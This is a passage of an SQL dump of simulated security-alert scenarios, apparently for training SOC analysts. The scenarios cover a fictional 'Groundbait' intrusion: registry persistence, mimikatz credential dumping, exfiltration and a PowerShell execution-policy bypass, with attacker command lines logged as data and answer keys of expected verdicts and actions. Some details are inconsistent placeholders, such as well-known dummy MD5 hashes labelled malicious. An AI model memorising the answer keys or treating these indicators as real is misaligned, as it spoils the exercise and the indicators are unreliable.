RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account on compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1287, 'Establishing Persistence with Registry Modifications', 'high', 'Registry Change Logs', 'To solidify their presence, Groundbait modifies registry settings on affected machines, ensuring the malware runs at every user logon and persists through reboots. The attacker has added a Run value named Groundbait under HKLM that points to groundbait.exe in the local Temp directory of the compromised user; an HKLM Run entry launching an executable from a per-user temp path is the key indicator, and the executable should be collected before the host is remediated.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:32:45Z\",\"event_id\":\"4624\",\"user\":\"compromised_user\",\"host_ip\":\"192.168.1.15\",\"malware_name\":\"Groundbait\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value\":\"Groundbait\",\"executable_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\groundbait.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"attacker_ip\":\"203.0.113.45\"}', '2026-02-24 03:14:42', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with Groundbait operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of the Groundbait malware executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"groundbait.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Groundbait 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Records\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1288, 'Credential Dumping for Lateral Movement', 'high', 'Security Information and Event Management (SIEM) Logs', 'Groundbait employs credential dumping techniques to harvest login information, allowing them to move laterally across the network and expand their surveillance scope. In this instance, a suspicious process was detected accessing LSASS memory on a domain controller. The log attributes the access to mimikatz.exe on DC01.corporate.local from 192.168.1.100, with administrator@corporate.local as the affected account; because the dump happened on a domain controller and involves a domain administrator account, every credential cached on that host should be considered exposed, and the credential reset listed in the expected actions should be completed before the host is returned to service.', 'Credential Access', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:01Z\",\"event_id\":\"4624\",\"event_type\":\"Process Access\",\"computer_name\":\"DC01.corporate.local\",\"source_ip\":\"192.168.1.100\",\"target_process\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"attacker_tool\":\"mimikatz.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\",\"affected_user\":\"administrator@corporate.local\"}', '2026-02-24 03:14:42', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a suspected compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Public IP associated with Groundbait APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint detection\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool detected on the 
network.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator@corporate.local\",\"is_critical\":true,\"osint_result\":{\"source\":\"active directory logs\",\"verdict\":\"suspicious\",\"details\":\"Domain administrator account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process 
Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1289, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Analysis', 'In the final phase, Groundbait exfiltrates gathered intelligence using encrypted communication channels, avoiding detection and completing their espionage mission. The network record shows user jdoe on 10.0.0.45 transferring confidential_report.docx (10485760 bytes) over TLS on port 443 to 203.0.113.5; because the payload is encrypted, the detection rests on the destination reputation, the transfer volume and the anomaly score of 85 rather than on content inspection, so the destination should be verified against threat intelligence before the transfer is treated as confirmed exfiltration.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:45:32Z\",\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"TLS\",\"port\":443,\"file_hash\":\"a1b2c3d4e5f6071829304b5c6d7e8f90\",\"filename\":\"confidential_report.docx\",\"user\":\"jdoe\",\"action\":\"exfiltration\",\"bytes_transferred\":10485760,\"anomaly_score\":85}', '2026-02-24 03:14:42', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Log\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f6071829304b5c6d7e8f90\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash linked to Groundbait APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document transferred over encrypted channel.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"internal\",\"details\":\"Internal user account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1290, 'Unauthorized Access Detected on Ukrainian Infrastructure', 'high', 'Firewall logs', 'An attacker has begun an operation by exploiting a vulnerability in a public-facing web server of a Ukrainian infrastructure entity, seeking initial access to the network. The attacker used a known exploit targeting a web application flaw, allowing them to initiate a connection from a suspicious external IP address. The firewall record shows a GET to /vulnerable_endpoint from 185.142.236.34 that matched the signature CVE-2023-XXXX Exploit (a placeholder, not a real CVE identifier) and was answered with HTTP 200 and 4532 bytes, so the exploit attempt should be assumed to have succeeded until the web server is verified clean. Note that 185.142.236.34 is a publicly routable address rather than the 203.0.113.0/24 documentation range used elsewhere in these scenarios; do not act on it outside this exercise.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T13:45:30Z\",\"src_ip\":\"185.142.236.34\",\"dst_ip\":\"192.168.1.10\",\"dst_port\":80,\"http_method\":\"GET\",\"url\":\"/vulnerable_endpoint\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36\",\"status_code\":200,\"response_size\":4532,\"malicious_payload\":\"d41d8cd98f00b204e9800998ecf8427e\",\"detected_signature\":\"CVE-2023-XXXX Exploit\"}', '2026-02-24 03:15:13', '2026-02-25 10:22:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.142.236.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal web server targeted by exploit.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious payload hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1291, 'Suspicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'An advanced threat actor executed a suspicious PowerShell script on an internal system, enabling microphone access for potential surveillance operations. The EDR record shows powershell.exe run by user jdoe on 192.168.1.42 with the -ExecutionPolicy Bypass and -NoProfile switches to execute EnableMic.ps1 from the local Temp directory; the explicit policy bypass and the script location in a writable temp path are the detection cues, and the script file should be collected for analysis before the host is remediated.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.42\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\\\\Temp\\\\EnableMic.ps1\",\"script_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ip\":\"203.0.113.45\",\"file_name\":\"EnableMic.ps1\"}', '2026-02-24 03:15:13', '2026-02-25 10:24:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"This IP belongs to the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"The hash matches a known suspicious script used for unauthorized surveillance.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"This IP is associated with known malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"EnableMic.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"The PowerShell script is designed to enable microphone access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, 
NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1292, 'Persistence Mechanism Established via Registry Modification', 'high', 'Registry change logs', 'To maintain access to the compromised system, the attacker modified the system registry keys to ensure a malicious script executes automatically at every user logon. This persistence mechanism allows the attacker to regain access without manual intervention. The registry log (event 4657) shows a Run value named MaliciousScript under HKLM whose data points to evilscript.exe in System32, written with regedit.exe by COMPROMISED_USER on 192.168.1.100; regedit.exe is a legitimate Windows binary, so the indicator to block and hunt for is the Run value data and the evilscript.exe hash, not the editor that wrote it. Writing under HKLM also implies the account had administrative rights at the time.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":4657,\"event_type\":\"Registry Value Change\",\"user\":\"COMPROMISED_USER\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"registry_value_name\":\"MaliciousScript\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\evilscript.exe\\\"\",\"process_name\":\"regedit.exe\",\"host_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-02-24 03:15:13', '2026-02-25 10:30:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP address with previous malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"File path of the malware set for 
persistence\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"COMPROMISED_USER\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account used to modify registry keys\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value 